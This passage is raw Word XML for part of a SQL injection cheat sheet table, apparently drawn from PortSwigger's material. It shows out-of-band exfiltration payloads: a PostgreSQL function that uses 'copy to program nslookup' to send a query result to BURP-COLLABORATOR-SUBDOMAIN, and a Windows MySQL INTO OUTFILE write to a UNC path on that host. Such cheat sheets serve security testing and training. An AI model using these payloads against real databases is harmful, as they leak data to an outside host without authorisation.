            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT into p (SELECT YOUR-QUERY-HERE);</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>execute c;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>END;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>$$ language plpgsql security definer;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>SELECT f();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B8074B" w:rsidRPr="00B8074B" w14:paraId="45D5BBE5" w14:textId="77777777" w:rsidTr="00B8074B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4281AAFC" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0389502F" w14:textId="77777777" w:rsidR="00B8074B" w:rsidRPr="00B8074B" w:rsidRDefault="00B8074B" w:rsidP="00B8074B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>The following technique works on Windows only:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B8074B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="526AEEB7" w14:textId="77777777" w:rsidR="00551481" w:rsidRDefault="00551481"/>
    <w:sectPr w:rsidR="0055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13"/>
    <w:rsid w:val="004E4320"/>
    <w:rsid w:val="00532D13"/>
    <w:rsid w:val="00551481"/>
    <w:rsid w:val="006A07A5"/>
    <w:rsid w:val="00B8074B"/>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84307-FE96-443B-B3DB-314B67E1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07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807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B8074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4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8074B"/>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B8074B"/>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B8074B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B807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80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483577">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1301421730">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rtswigger.net/burp/documentation/desktop/tools/collabor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swigger.net/web-security/xxe" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/collaborator" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-inje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2024-03-04T08:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-04T08:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>